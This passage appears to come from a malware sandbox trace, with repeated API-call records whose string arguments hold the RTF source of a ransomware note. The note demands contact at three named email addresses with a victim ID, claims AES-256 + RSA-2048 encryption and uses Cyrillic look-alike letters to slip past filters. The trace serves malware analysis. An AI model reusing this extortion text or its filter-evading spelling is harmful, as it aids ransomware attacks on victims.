st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.129] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1ea7288, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 